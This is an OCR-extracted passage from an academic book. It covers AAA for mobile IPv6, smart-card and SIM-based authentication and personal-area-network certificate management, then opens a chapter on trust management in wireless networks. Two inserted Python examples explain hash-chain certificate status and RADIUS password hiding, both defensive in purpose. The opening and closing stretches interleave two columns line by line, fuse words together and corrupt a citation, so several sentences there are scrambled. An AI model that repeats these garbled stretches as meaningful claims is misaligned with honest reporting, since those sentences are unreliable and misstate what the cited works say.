is fixed, but the CoA is generated by theintegrating visited Diameter-based authentication into
network. The mobile IP protocol binds these two the MIPv6 system. But, when the user is using
addresses together. To ensure an optimal rout- services on the remote network, the remote AAA
ing in the network, the terminals switch to route has to keep a connection with the home AAA.
optimalisation mode after joining a new network. The proposed new approach of Lee, Huh, et al.
Then it executes a return routability procedure suggests enabling faster authentication when the
and a binding update (BU) to communicate to the terminal moves between subnets inside a domain
correspondent node directly. The return routabil- by exchanging authentication data between visited
ity procedure consists of several messages, which AAA servers without the need of renegotiation
together induce a long delay. with the HA. Connection to the HA is needed
The handover between networks implies even only after the authentication when the terminal
more steps and consumes more time: movement executes a BU.
detection,addressconfiguration,homeBU, return
One other aspect is shown by Li, Ye, and Tian
routability procedure, and a BU to the correspon- (2006) suggesting a topology-aware AAA overlay
dent node. The terminal cannot communicate with network. This additional network could help MIPv6
the CN before the end of the procedure. to make more effective decisions and to prepare for
Fast handover capability is a major research handoversandotherchangesinnetwork - configura
item in IETF for MIPv6, including the standards tion. Based on the AAA servers and connections
FMIPv6 and HMIPv6. In addition to these schemes, between, a logical AAA backbone can be created,
Ryu and Mun (2006) introduce an optimisation in which can serve as administration backbone for the
order to lower the amount of signalling required and whole network. Signals delivered over this network
thus lower the handover delay between domains. are topologically aware, so the optimal route can
In an IPv6 system, the IP mobility and AAA are easily be selected and signalling messages can be
handled by different entities. This architecture transmitted over the best route. In exchange to
implies unnecessary delays. Several solutions are the build cost of this backbone network and some
proposed to enable the mobile terminal to build additional bandwidth consumed, MIPv6’s security
a security association between the mobile node and performance can be enhanced.
and the HA. This enables home BU during the As the route of the service access is secured,
AAA procedure. Route optimisation is a key topic optimised and delay reduced, one basic problem
in efficient mobility service provision. MIPv6
still remains: how to ensure that the user is the
optimises the route with the use of the return one, the network thinks he/she is. Lee, Park, and
routability procedure. In wireless environments, Jun (2006) suggest using smart cards to support
the generated signalling messages represent a con- interdomain roaming. The use of the SIM might
siderable part of the whole overhead. Moving route be preferable because of its widespread use and
optimisation into the AAA procedure can reduce cryptographiccapabilities(KálmánNoll, & .026)
the delay by nearly 50% (Ryu & Mun, 2006). This The problem of having multiple devices is also


Authentication, Authorisation, and Access Control in Mobile Systems

raised here, since a system based on the SIM as smart card will require SIM readers in every device, if a secure key exchange method between the devices is not in place.

Lee, Park, et al. (2006) suggest an entity called roaming coordinator ensuring seamless roaming services in the converged network. This additional node provides context management services and enables seamless movement between the third generation (3G) network and WLAN to enforce security in converged networks. In order to provide a good user experience in a pervasive environment, additional intelligence needs to be added to the traditional AAA systems to ensure that the terminal selects the most appropriate connection method. This method has to be based on the context and has to be supported in all networks. A smart-card-based secure roaming management framework enables the transfer of the terminal's context without renegotiating the whole security protocol set. When the terminal moves into a new network, the roaming coordinator, AAA servers, and proxies take charge of the authentication process. The coordinator, having received a roaming request, evaluates the available networks and chooses the best available one, and then triggers the context transfer between the corresponding AAA servers. When transferring whole user contexts, the system has to consider the privacy requirements of the user's identity and his/her profile.

Anonymity and Identity

In pervasive environments, privacy is of key importance. With computers all around, gathering information about traffic, movements, service access, or physical environment, customer privacy must be protected. Køien (in press) suggests a protocol which is able to provide better protection for the user's privacy than the normal 3G network. Changes in the EAP-AKA protocol are suggested to use only randomly generated user authentication values. He defines three user contexts implying different key management and authentication schemes, like existing keys for short-term and fresh keys for medium-term access. Identity-based encryption is recommended to enable a flexible binding of the security context to protect the permanent subscriber identity and location data, which will only be discoverable by the home register. The main drawback of the suggested protocol is its higher computing requirements as compared to EAP-AKA, potentially limiting the applicability.

Security and Computing Power

A security protocol in a wireless environment should be fast and secure, and it has to be effective in terms of computing power and low data transfer need. In low power environments an authentication scheme with high security and low computing power is advised. One solution is based on hash functions and smart cards, allowing minimised network traffic and short message rounds used for authentication. Anonymity can be ensured through one-time passwords. While accepting the advantages of a system with smart cards, the use of extra hardware like a card reader is not advisable, due to compatibility issues and power requirements.

Software-based solutions have an advantage, as they only require computing power. Showing the importance of power consumption, a comparison of cryptographic protocols is presented by Lee, Hwang, and Liao (2006) and Potlapally, Ravi, Raghunathan, and Jha (2006), showing that twice the transmit energy of one bit is needed to run asymmetric encryption on that piece of information. Symmetric encryption needs, in contrast, around one half of the transmit energy. Most overhead is generated by session initialisation, meaning longer sessions induce lower overhead. There is a trade-off between security and session length. While negotiation overhead is getting lower with long sessions, security risks are getting higher. This overhead can be lowered by special hardware or software solutions. Hardware needs some power and bigger silicon, while software requires a faster CPU. Hash functions have an energy requirement of around half a percent compared to PKI in generating session keys (Potlapally et al., 2006). Key exchange protocols using elliptic curve Diffie-Hellman (DH) come out much more energy efficient as compared to traditional DH of the same strength. The DH calculations demonstrate the trade-off between power consumption and security. In order



to have an efficient operation, the security protocol needs to have the possibility to adapt encryption to the needs of the current application. Authentication token generation can be problematic for devices with limited computing capabilities. Personal area networks (PAN) with multiple devices raise this problem by their very nature.

Security in Personal Area and Home Networks

Efficient authentication and certificate management ensures better usability of PAN devices. By using efficient security protocols, content-adaptive encryption, and efficient key and certificate management, considerably longer battery operation is achievable. To enable key management in a PAN, a personal certificate authority (CA) entity is suggested (Sur & Rhee, 2006; Sur, Yang, & Rhee, 2006), which will be responsible for generating certificates for all mobile devices within the PAN or home device domain (Popescu, Crispo, Tanenbaum, & Kamperman, 2004). Because of the context of use, the authentication protocol is focused on efficiency by reducing computational overheads for generating and verifying signatures.

The main focus is on reducing PKI operations, which have been proven to be energy consuming. Instead, it proposes to use hash chains to lower communication and computational costs for checking certificates. Former research suggested hash trees in order to authenticate a large number of one-time signatures. By extending these with fractal-based traversal, it has been proven that these trees provide fast signature times with low signature sizes and storage requirements. The personal CA has to be a unique trusted third party in the PAN. It needs to have a screen and a simple input device, and has to always be available for the members of the network. A cell phone with the SIM is a perfect candidate to be a personal CA (Kálmán & Noll, 2006).

In home environments, basically two types of authentication are distinguished: (1) user authentication, and (2) device authentication (Jeong, 2006). Mutual authentication has to be used in order to prevent impersonation attacks (identity theft). This requires an SSO infrastructure, which can be for example Kerberos or RADIUS. A special aspect of resource access over the home LAN is that specific privileges are given to selected programs. The AAA server maintains an access control list to ensure correct privilege distribution.

To build the initial trust relationships some kind of user interaction is needed. The key should initially be distributed out-of-band, for example on a USB stick, or by using a short range wireless technology, for example Near Field Communication (NFC) (Noll, Lopez Calvet, & Myksvoll, 2006). On home networks, where power consumption is not a problem, PKI may be used for negotiating session keys between devices, since key management in a PKI is simpler than in symmetric encryption and the delay caused by checking certificates and so forth will not be noticeable in this environment. Users authenticated towards the AAA infrastructure can access the resources seamlessly. Initial authentication is done with PKI. In the case of mobile devices, the home AAA can also use previously calculated hash values in a chain to lower computational cost. These AAA infrastructures can be connected to a provider's AAA, for example for use in digital rights management (DRM) or home service access from a remote network (Popescu et al., 2004).

A user moving with his/her devices to the home raises another AAA challenge, the mobile nodes.

Mobile Nodes (Network Mobility)

Movement of whole networks like PANs or networks deployed on a vehicle introduces a new level of AAA issues. In a conventional network, standard mobility support does not describe route optimisation. Several procedures are suggested to provide this functionality for mobile nodes, like Recursive Binding Update Plus (RBU+), where route optimisation is operated by MIPv6 instead of the network mobility (NEMO) architecture. This means that every node has to execute its own BU with the corresponding HAs. To solve problems with pinball routing, it uses the binding cache in the CN. When a new BU message arrives, the RBU+ has to execute a recursive search, which



leads to serious delays with a growing cache size. One potential route optimisation is presented by Jeong (2006). A designated member of the network, called a mobile router, is elected to deal with mobility tasks to reduce network overhead. The AAA protocol for this environment defines a handover scheme and tree-based accounting to enable efficient optimisation. They recommend using the dual BU (DBU) procedure instead of the existing procedures like RBU+ as a solution for the reverse routing problem raised by mobility. DBU operates with additional information placed into the messages sent in a BU process. This is the CoA of the top level mobile router (TLMR). By monitoring the messages, the CNs in the subnet can keep an optimal route towards the TLMR.

Moving subnets are subject to eavesdropping and possible leakage of the stored secrets. A secure AAA is proposed for network mobility over wireless links, which deals with these problems (Fathi et al., 2006). Secret leakage can be caused by malicious eavesdroppers, viruses, or Trojans. One possibility is to store the keys in tamper resistant modules, like smart cards, the SIM, or trusted hardware modules. Deploying additional modules can be problematic and expensive. Fathi et al. propose a protocol based on a short secret, which can be remembered by humans and used in a secure protocol called Leakage-resilient authenticated key exchange protocol (LR-AKE). This protocol is used for AAA to reduce NEMO latency under 300 ms in order to provide session continuity, for example in VoIP applications, which is important in keeping a good user experience. However, short passwords as proposed with LR-AKE are not advisable. If complex, they will be noted down by the user, and if weak, they are easy to guess.

As network mobility has considerable security issues, it may not be the way to go. The functionality of a mobile network might be achieved by using a dedicated device as a gateway of the PAN. Only this device will show up in the wireless network, and all traffic originating from and arriving to the PAN will go through this device and its HA.

After these technical issues of authentication, the next section will deal with authentication from the user viewpoint.

Customer Ergonomics

There is always a trade-off between user security and ease of use. If the system is prompting for a password for every transaction, it can assume with quite high probability that the access is enabled just for the correct user. But that is unacceptable for most of the users in private environments, where convenience is more valued than security. In corporate networks, policies are just enforced and users have to accept it. It would however be problematic if the credentials were only asked once at start-up or when connecting to the network, since mobile devices are threatened by theft, loss, and other dangers by their nature of use.

Smart cards could be a solution to have a good trade-off between usability and security. Since the user will have a token, which he/she has to take care of, and exchange keys generated by it, at least it could be ensured that the user who is accessing a specified service holds the authentication token. The mobile phone with the integrated smart card, the SIM, is a potential tool for this purpose. As indicated by Leu et al. (2006), the requirement of carrying a SIM reader or equipping all the equipment with SIM cards is neither convenient nor cost effective. The possibility of secure key exchange between user equipment shall be provided.

The cell phone can act as a key negotiator, with its tamper resistant cryptographic functions integrated into the SIM, and then exchange the session keys with other terminals with the use of a short range wireless solution. Currently, most of the security problems, besides the user behaviour, are coming from security holes in the software. Having the capability to download new software over the air to the phone ensures the use of recent updates and eliminates this type of security threat (Kálmán & Noll, 2006). Compared to a security token, it may be better to use the phone, since the SIM card can be locked by the provider, so if the device gets lost, the authentication credentials can be withdrawn within a short time.
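The personal CA scheme in the Security in Personal Area and Home Networks section above replaces repeated signature checks with hash chains. The following added example (constructed for this edition, not code from the chapter or from Sur & Rhee) shows one way such a chain can carry certificate status: the CA commits to the chain tip in the certificate and, for each validity period, releases one preimage as a "still valid" token; a verifier confirms freshness with a handful of hash operations and no public-key work. Class and function names, the period count and the key identifiers are assumptions.

```python
"""Hash-chain certificate status for a personal CA (added example).

Constructed illustration, not code from the chapter. The CA keeps the chain
seed h_0 secret, publishes the tip h_n = H^n(h_0) inside the certificate, and
for period i releases h_{n-i}. Verifying period i costs i hash operations;
revocation is simply never releasing the next preimage.
"""
import hashlib
import os
from dataclasses import dataclass
from typing import Dict, List, Optional


def H(data: bytes) -> bytes:
    return hashlib.sha256(data).digest()


def build_chain(seed: bytes, n: int) -> List[bytes]:
    """Return [h_0, h_1, ..., h_n] with h_0 = seed and h_i = H(h_{i-1})."""
    chain = [seed]
    for _ in range(n):
        chain.append(H(chain[-1]))
    return chain


@dataclass(frozen=True)
class Certificate:
    subject: str
    public_key_id: str  # stand-in for the device's public key (assumption)
    anchor: bytes       # h_n, the chain tip committed to at issuance
    periods: int        # n, the number of validity periods the chain covers


class PersonalCA:
    """The phone acting as personal CA (assumed name); it holds every seed."""

    def __init__(self, periods: int = 30):
        self.periods = periods
        self._chains: Dict[str, List[bytes]] = {}

    def issue(self, subject: str, key_id: str) -> Certificate:
        seed = os.urandom(32)  # secret; only hashes of it ever leave the CA
        chain = build_chain(seed, self.periods)
        self._chains[subject] = chain
        return Certificate(subject, key_id, chain[-1], self.periods)

    def status_token(self, subject: str, period: int) -> Optional[bytes]:
        """Release h_{n-period} for a still-valid device; None when revoked."""
        chain = self._chains.get(subject)
        if chain is None:
            return None
        if not 1 <= period <= self.periods:
            raise ValueError("period outside the chain's coverage")
        return chain[self.periods - period]

    def revoke(self, subject: str) -> None:
        # Dropping the chain means no further preimage can ever be released.
        self._chains.pop(subject, None)


def verify_status(cert: Certificate, token: Optional[bytes], period: int) -> bool:
    """Accept iff H^period(token) equals the anchor in the certificate."""
    if token is None or not 1 <= period <= cert.periods:
        return False
    h = token
    for _ in range(period):
        h = H(h)
    return h == cert.anchor


if __name__ == "__main__":
    ca = PersonalCA(periods=10)
    cert = ca.issue("phone", "key-1")
    print("period 3 valid:", verify_status(cert, ca.status_token("phone", 3), 3))
    ca.revoke("phone")
    print("after revocation:", verify_status(cert, ca.status_token("phone", 4), 4))
```

Note that a token for period i also lets anyone derive the tokens for periods 1..i-1 by hashing, which is harmless here: the chain proves the certificate was still good at period i, and the CA withholds later preimages to revoke.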



Outlook

Current research is focused on merging basic network functions to enable pervasive computing and network access. The result of these efforts is a converged infrastructure, which is able to handle most user needs in high quality. The problem of QoS control in wireless systems remains an open one, but experiences of VoIP and VoD services in wireless networks show the adaptability of the user to the current environment.

Mobility of packet data is still to be enhanced, with the challenge of reducing the handover delay. Remote access to home content is just beginning to spread between early adopters. MIPv6 will address most of the issues sometime in the future, and with the promising extensions, the protocol will be able to handle sessions together with the AAA infrastructure without service interruption. Mobile networks will use WLAN as a high capacity data service, although upcoming solutions and MIPv6 extensions may be able to threaten their use inside densely populated areas, assuming global Wi-Fi roaming mechanisms are in place.

Efforts are being made towards an easily deployable home AAA infrastructure, which can later bear the tasks associated with inner (user management, remote access, user content DRM, purchased media DRM) and outer (authentication towards corporate, provider- or public-based AAA) authentication and access control.

Educating the user might be the biggest challenge, as mobile phone users represent the whole population, and not just the educated computer community. The enforcement of the use of smart cards is advisable, where the possible use of the mobile phone shall be investigated.

Now, we can experience the dawn of new social and community services over the Internet. This raises the problem of privacy protection as never before. AAA services must take care of user credentials, and even must ensure that data collected from different AAA providers cannot be merged. So, research in the area of one-way functions, blind signatures, and different PKI methods is recommended.

Finally, current market players also have to change their business plans. Research in the economical area has to point out new objectives to ensure a good working, open, and secure AAA infrastructure which can be used by every service provider while keeping information exchange on the required minimal level.

Conclusion

The biggest effort in AAA systems is on extending the capabilities of the existing solutions in telecommunication and in computer networks to an integrated network approach enabling seamless service access of mobile users.

While telecom solutions are usually more secure, user privacy is not a primary concern there. In computer networks AAA solutions are more open and flexible, while the widespread model of "web of trust" methods is not acceptable for commercial service exchange. Ongoing research indicates the potential for a common mobile/Internet authentication suite, potentially based on the EAP.

Interworking issues between mobile and wireless networks are the basis for detailed research on handover delay, multi-device roaming, mobile networks, security, ease-of-use, and anonymity of the user. This chapter provided an overview of the state of the art in authentication for mobile systems.

Extended AAA mechanisms are suggested for home and community networks, taking into account security and privacy of the users. These networks will keep a high amount of personal data, and thus need stronger privacy protection mechanisms. By using link layer encryption, smart cards, and secure key transfer methods the security and privacy protection can be greatly enhanced.

References

Chowdhury, M. M. R., & Noll, J. (2007). Service interaction through role based identity. In Proceedings of the International Conference on Wireless and Mobile Communications (ICWMC 2007).



Fathi, H., Shin, S., Kobara, K., Chakraborty, S. S., Imai, H., & Prasad, R. (2006). LR-AKE-based AAA for network mobility (NEMO) over wireless links. IEEE Journal on Selected Areas in Communications, 24(9), 1725-1737.

Janevski, T., Tudzarov, A., Janevska, M., Stojanovski, P., Temkov, D., Kantardziev, D., et al. (2006). Unified billing system solution for interworking of mobile networks and wireless LANs. In Proceedings of the IEEE Electrotechnical Conference MELECON 2006 (pp. 717-720).

Jeong, J., Chung, M. Y., & Choo, H. (2006). Secure user authentication mechanism in digital home network environments. In Embedded and Ubiquitous Computing (LNCS 4096).

Jeong, K. C., Lee, T.-J., Lee, S., & Choo, H. (2006). Route optimization with AAA in network mobility. In Computational Science and Its Applications—ICCSA 2006 (LNCS 3981).

Kálmán, Gy., Chowdhury, M. M. R., & Noll, J. (2007). Security for ambient wireless services. In Proceedings of the 65th IEEE Vehicular Technology Conference (VTC 2007).

Kálmán, Gy., & Noll, J. (2006). SIM as a key of user identification: Enabling seamless user identity management in communication networks. In Proceedings of the WWRF meeting #17.

Khara, S., Mistra, I. S., & Saha, D. (2006). An alternative architecture for WLAN/GPRS integration. In Proceedings of the IEEE Vehicular Technology Conference, 2006, VTC 2006 (pp. 37-41).

Køien, G. M. (in press). Privacy enhanced mobile authentication. Wireless Personal Communications.

Lee, C.-C., Hwang, M.-S., & Liao, I.-E. (2006). Security enhancement on a new authentication scheme with anonymity for wireless environments. IEEE Transactions on Industrial Electronics, 53(5), 1683-1687.

Lee, M., Park, S., & Jun, S. (2006). A security management framework with roaming coordinator for pervasive services. In Autonomic and Trusted Computing (LNCS 4158).

Lee, S.-Y., Huh, E.-N., Kim, Y.-W., & Lee, K. (2006). An efficient authentication mechanism for fast mobility service in MIPv6. In Computational Science and Its Applications—ICCSA 2006 (LNCS 3981).

Leu, J.-S., Lai, R.-H., Lin, H.-I., & Shih, W.-K. (2006). Running cellular/PWLAN services: Practical considerations for cellular/PWLAN architecture supporting interoperator roaming. IEEE Communications Magazine, 44(2), 73-84.

Li, J., Ye, X.-M., & Tian, Y. (2006). Topologically-aware AAA overlay network in mobile IPv6 environment. In Networking 2006 (LNCS 3976).

Long, M., & Wu, C.-H. (2006). Energy-efficient and intrusion-resilient authentication for ubiquitous access to factory floor information. IEEE Transactions on Industrial Informatics, 2(1), 40-47.

Noll, J., Lopez Calvet, J. C., & Myksvoll, K. (2006). Admittance services through mobile phone short messages. In Proceedings of the International Conference on Wireless and Mobile Communications ICWMC'06.

Popescu, B. C., Crispo, B., Tanenbaum, A. S., & Kamperman, F. L. A. J. (2004). A DRM security architecture for home networks. In Proceedings of the 4th ACM Workshop on Digital Rights Management.

Potlapally, N. R., Ravi, S., Raghunathan, A., & Jha, N. K. (2006). A study of the energy consumption characteristics of cryptographic algorithms and security protocols. IEEE Transactions on Mobile Computing, 5(2), 128-143.

Ren, K., Lou, W., Kim, K., & Deng, R. (2006). A novel privacy preserving authentication and access control scheme for pervasive computing environments. IEEE Transactions on Vehicular Technology, 55(4), 1373-1384.

Ryu, S., & Mun, Y. (2006). An optimized scheme for mobile IPv6 handover between domains based on AAA. In Embedded and Ubiquitous Computing (LNCS 4096).

Sur, C., & Rhee, K.-H. (2006). An efficient authentication and simplified certificate status manage-



ment for personal area networks. In Management of Convergence Networks and Services (LNCS 4238).

Sur, C., Yang, J.-P., & Rhee, K.-H. (2006). A new efficient protocol for authentication and certificate status management in personal area networks. In Computer and Information Sciences—ISCIS 2006 (LNCS 4263).

Zhang, Y., & Fujise, M. (2006). An improvement for authentication protocol in third-generation wireless networks. IEEE Transactions on Wireless Communications, 5(9), 2348-2352.

Key Terms

Authentication, Authorisation, and Accounting (AAA): AAA is a system that handles all users of the system to ensure appropriate rights management and billing.

Converged Network: A converged network is a network carrying various types of traffic. Such a network is providing services to different terminals, which can access and exchange content regardless of the current networking technology they are using.

Diameter: Diameter is a proposed successor of RADIUS. It uses TCP as a transport method and provides the possibility to secure transmissions with TLS. It is not backward compatible with RADIUS.

Digital Rights Management (DRM): DRM is a software solution that gives the content creator the power to keep control over use and redistribution of the material. It is used mostly in connection with digital media provider companies, but in pervasive environments, users may also require a way to have a fine-grained security infrastructure in order to control access to their own content.

Extensible Authentication Protocol (EAP): EAP is a flexible protocol family, which includes TLS and IKE protocols, and also the default authentication method of UMTS, EAP-AKA.

International Mobile Subscriber Identity (IMSI), Temporary IMSI (TMSI): IMSI and TMSI are the unique identity numbers used in UMTS to identify a subscriber. The temporary one is renewed from time to time, and it is the only one that is used over the air interface.

Public Key Infrastructure (PKI): PKI is a service that acts as a trusted third party, manages public keys, and binds users to a public key.

Remote Authentication Dial In User Service (RADIUS): RADIUS is the de facto remote authentication standard over the Internet. It uses UDP as a transport method and is supported by software and hardware manufacturers. Privacy problems may arise when it is used on wireless links, since only the user password is protected by an MD5 hash.

Rivest-Shamir-Adleman (RSA): RSA is the de facto standard of public key encryption.

Smart Card: A smart card is a tamper resistant pocket sized card, which contains tamper resistant non-volatile storage and security logic.

Subscriber Identity Module (SIM): The SIM is the smart card used in GSM and UMTS (as USIM) networks to identify the subscribers. It has integrated secure storage and cryptographic functions.
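The RADIUS key term above notes that only the user password is protected by an MD5-based transformation. The following added example (written for this edition, not code from the chapter) implements the User-Password hiding of RFC 2865 section 5.2 and builds a small constructed Access-Request attribute list, so that it is visible which attributes travel in the clear. Function names, the shared secret and the sample Request Authenticator are constructed values.

```python
"""RADIUS User-Password hiding (RFC 2865 section 5.2), added example.

Not code from the chapter. The password is padded to a multiple of 16 bytes
and XORed, block by block, with b_1 = MD5(secret || RequestAuthenticator),
b_i = MD5(secret || c_{i-1}). Only attribute type 2 (User-Password) gets
this treatment; User-Name, NAS-IP-Address and the rest are sent as-is.
"""
import hashlib
from typing import List, Tuple

USER_NAME, USER_PASSWORD, NAS_IP_ADDRESS = 1, 2, 4  # attribute types from RFC 2865


def hide_password(password: bytes, secret: bytes, authenticator: bytes) -> bytes:
    """Transform a cleartext password into the on-the-wire User-Password value."""
    if len(authenticator) != 16:
        raise ValueError("Request Authenticator must be 16 bytes")
    if not 1 <= len(password) <= 128:
        raise ValueError("password must be 1..128 bytes")
    padded = password + b"\x00" * (-len(password) % 16)
    out, prev = bytearray(), authenticator
    for i in range(0, len(padded), 16):
        b = hashlib.md5(secret + prev).digest()          # keystream block
        c = bytes(x ^ y for x, y in zip(padded[i:i + 16], b))
        out += c
        prev = c                                         # chains on ciphertext
    return bytes(out)


def reveal_password(hidden: bytes, secret: bytes, authenticator: bytes) -> bytes:
    """Inverse transform, as done by the RADIUS server holding the secret."""
    if not hidden or len(hidden) % 16:
        raise ValueError("hidden value must be a non-empty multiple of 16 bytes")
    out, prev = bytearray(), authenticator
    for i in range(0, len(hidden), 16):
        c = hidden[i:i + 16]
        b = hashlib.md5(secret + prev).digest()
        out += bytes(x ^ y for x, y in zip(c, b))
        prev = c
    # Padding was NUL bytes; a password ending in NUL would lose them here.
    return bytes(out).rstrip(b"\x00")


def access_request_attributes(user: str, password: str, secret: bytes,
                              authenticator: bytes) -> List[Tuple[int, bytes]]:
    """Constructed attribute list of an Access-Request; only type 2 is hidden."""
    return [
        (USER_NAME, user.encode()),
        (USER_PASSWORD, hide_password(password.encode(), secret, authenticator)),
        (NAS_IP_ADDRESS, bytes([192, 0, 2, 1])),  # documentation address, constructed
    ]


def cleartext_attribute_types(attrs: List[Tuple[int, bytes]]) -> List[int]:
    """Everything except User-Password is readable on a wireless link."""
    return [t for t, _ in attrs if t != USER_PASSWORD]


if __name__ == "__main__":
    ra = bytes(range(16))  # constructed Request Authenticator; real ones are random
    attrs = access_request_attributes("alice", "correct horse", b"shared", ra)
    print("in the clear:", cleartext_attribute_types(attrs))
    print("recovered:", reveal_password(attrs[1][1], b"shared", ra))
```

Two properties worth checking in a lab: the hidden value depends only on the password, the secret and the Request Authenticator, so a client that reuses an authenticator produces identical ciphertext for identical passwords, and the transform reveals the password length to 16-byte granularity. Both are reasons to carry RADIUS over a protected tunnel or to move to Diameter with TLS, as the key terms above suggest.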




Chapter XIV
Trustworthy Networks,
Authentication, Privacy,
and Security Models
Yacine Djemaiel
University of the 7th of November at Carthage, Tunisia

Slim Rekhis
University of the 7th of November at Carthage, Tunisia

Noureddine Boudriga
University of the 7th of November at Carthage, Tunisia

AbstrAct

Wireless networks are gaining popularity, which comes with the emergence of several networking technologies ranging from personal to wide area, from centralized to distributed, and from infrastructure-based to infrastructure-less. Wireless data link characteristics, such as the openness of the transmission medium, make these networks vulnerable to a novel set of security attacks in addition to those they inherit from wired networks. In order to ensure the protection of mobile nodes that are interconnected using wireless protocols and standards, it is essential to provide an in-depth study of a set of mechanisms and security models. In this chapter, we present the research studies and proposed solutions related to authentication, privacy, trust establishment, and management in wireless networks. Moreover, we introduce and discuss the major security models used in a wireless environment.

Introduction

Wireless networks are gaining popularity. Such popularity comes with the emergence of several networking technologies ranging from personal to wide area, from centralized to distributed, and from infrastructure-based to infrastructure-less. However, wireless data link characteristics such as the openness of the transmission medium make these networks vulnerable to a novel set of security attacks. In order to protect such networks, multiple security solutions were proposed for authenticating users, ensuring privacy, and establishing trust. Deploying wireless networks without considering the threats associated with this technology may lead to the compromise of the interconnected resources and also the loss of security.

To ensure the protection of mobile nodes that are interconnected using wireless protocols, several security mechanisms and security models have

Copyright © 2008, IGI Global, distributing in print or electronic forms without written permission of IGI Global is prohibited.
Trustworthy Networks

been provided. The solutions were made to cope with the features of the wireless environment and the mobile nodes. In this chapter, we present the research work and security solutions related to authentication, privacy, and trust management. Moreover, we introduce and discuss the major security models used in a wireless environment.

The first section of this chapter takes interest in the concept of trust, which can be defined as the firm belief in the competence of an entity to act dependably, securely and reliably within a specified context. Starting from this definition, it is significant that trust implies a level of uncertainty and judgment. This may depend on many factors due to the risks associated with wireless networks. In this section, we define trust in the wireless context and discuss its models.

The second section discusses authentication, which is a crucial mechanism that ensures that a resource is used by the appropriate entities. Actors, architecture, and issues related to authentication in the wireless environment are discussed.

The third section discusses authentication models and protocols in wireless LAN (WLAN), cellular, ad hoc, and wireless mobile access networks (WMAN). As Mobile IP is becoming a unifying technology for wireless networks, allowing mobile nodes to change their point of attachment without losing their connections, particular interest is also given to authentication in Mobile IP.

The fourth section of this chapter discusses privacy regarding location and transaction in the wireless environment. The fifth section presents the aspects regarding security modeling in wireless environments. The first is related to the specification of trust, modeling, and verification. The second addresses the specification and verification of security policies that take wireless threats into consideration.

Trust Management

Trust management represents the skeleton of any network security framework. The absence of a centralized entity, for example, in ad hoc networks makes trust management a challenging problem to address.

Trust Establishment Basis

Trust describes a set of relations among entities engaged in various protocols, which are established based on a body of assurance evidence. A trust relation is established between two different entities further to the application of an evaluation metric to trust evidence. The established relations may be composed with other trust relations to generate new relations. Trust may influence decisions including access control. To clarify the process of trust establishment, we consider the following example. Assume two trust relations A and B. Relation A states that "a certification authority CA1 accepts entity X's authentication evidences" and is established off-line upon delivery of some evidences (e.g., identity, employment card) by X to CA1. Upon the establishment of A, the certification authority CA1 issues a certificate binding a public key to X. Then, it stores the relation in its trust database, registering X with its certificate. Relation B states that "a certification authority CA2 accepts CA1's authentication of any entity registered by CA1". To establish B, certification authority CA2 may ask CA1 to deliver some evidences such as: (1) CA1's authentication of entities is done using satisfactory mechanisms and policy; and (2) certification authority CA1's trust database is protected using satisfactory security mechanisms and policies. The establishment of such a trust relation leads to the publication of a certificate signed by CA2, associating CA1's public key. The relation is then stored in CA2's trust database. The composition of the two trust relations leads to the acceptance of CA1's authentication of X by CA2.

One of the main properties that need to be handled during trust establishment is transitivity. To decide whether a trust relation is transitive or not, evidences used to establish trust should ensure (1) availability, meaning that evidences can be evaluated at any time by the entities wishing to establish trust; (2) uniformity, meaning that evidences satisfy the same global metrics of adequacy; (3) stability, which means that the authen-


tication mechanism cannot change accidentally or intentionally; and (4) long-term existence, meaning that evidences last as long as the time used to gather and evaluate them.

Need for Trust Management in Mobile Networks

While there are extensive research works that contributed to the management of trust in complex systems, the great majority of them was set up for fixed infrastructures; assumed long-term availability and validation of evidences; and generated a lengthy validation process. Several characteristics of wireless networks including unreliable transmission range and topology changes made trust management a challenging task. The focus on ad hoc networks was based on the fact that these networks are self-organized and barely suppose the existence of trustworthy nodes. In infrastructure-based wireless networks such as cellular networks and WLAN, the base stations (BSs) (or access points [APs]) are considered trustworthy. Three main requirements need to be fulfilled by the trust establishment process in wireless ad hoc networks. First, trust should be established in a distributed manner without a pre-established trust infrastructure. In fact, connectivity to certification authorities' directory servers in the node's home domain cannot be guaranteed in a mobile ad hoc network (MANET) when needed. As a consequence, trust establishment in MANET must support peer-to-peer trust relations.

Second, trust establishment should be performed online and trust relations should have a short-life period. This is mainly due to the fact that in MANET, when a node moves randomly from one location to another, its security context may change. For instance, when a node moves to a location in which its compromise becomes possible, any trust relation that involves such a node should be withdrawn. Such behavior should not affect network connectivity and new trust evidences should be gathered as a consequence. Third, trust establishment should be tolerant to incomplete evidence or unavailable trust relations. In fact, in MANET, it becomes unfair to suppose that all evidences are available to all nodes when they are required to establish trust. Therefore, trust relations should be established using incomplete or uncertain trust evidences, based on the incomplete amount of information that each node holds.

When nodes plan to communicate, they must initially interact with each other and establish a certain level of trust. The change of such a level may be triggered further to interaction between neighboring nodes or further to a recommendation from a third party. As a node in the MANET has only a partial view of the whole network, additional mechanisms should be designed to allow these nodes to identify valid trust evidences and prevent intruders from altering them or modifying the trust value of other nodes. To clarify this issue, Figure 1 depicts two networks. In the first network, users User1x need to communicate very often with server Server1. In the second network, users User2x need to communicate very often with server Server2. Different trust relations can be established. Nodes in networks 1 and 2 trust each other based on identity certificates which are registered by certification authorities CA1 and CA2, respectively. In this scenario, User12 has lost communication with Server1 and User11, because it moved out of the coverage. Some among User2x can be found within the communication range of User12. To reach Server1, User12 has to authenticate itself to any User2x and get access to the second ad hoc network. To do so, User12 provides its certificate (as signed by CA1) to User21. User21 has to decide whether to accept such trust evidence. Assume now that the access policy requires that any node that wants to access the ad hoc network should provide a valid identity certificate from a trusted authority. Thus, User21 should contact its trusted certification authority (CA2) and get the CA1 certificate signed by CA2. After that, User21 will be able to validate the certificate of User12. Transitivity of the trust relation is thus established.

Recent Advances in Trust Management

Former trust establishment solutions focused mainly on procedures to locate the communicating peer's certificate in order to determine the cryp-


Trustworthy Networks

Figure 1. Trust establishment in ad hoc network

CA CA

Server
Server

User User
User
User
Ad-hoc network  User

Broken link
Communication link
Ad-hoc network 
Trust relation

tographic key. In this context, Balfanz, Smetters, contains the signature on the selected binding
Stewart, and Wong (2002) base its solution on from the received secret list. These certificat
using a location-limited channel to allow nodes will therefore be stored locally. The value of k is
performing pre-authentication of each other. As chosensothatthereisasufficienttrustrelati
the propagation of the channel is limited, intrud- in the network and the distribution scheme should
ers have an outside chance to mount a successful ensure the certainty of being able to establish a
passive attack. While pre-authentication does not trust chain between any two nodes.
require a heavy bandwidth, the existence of loca- After the system bootstrapping - phase is fin
tion-limited channel represents a very restrictive ished, there is no need for the secret dealer to
assumption. The approach proposed in Ren et al. continue existing. To accommodate the dynamic
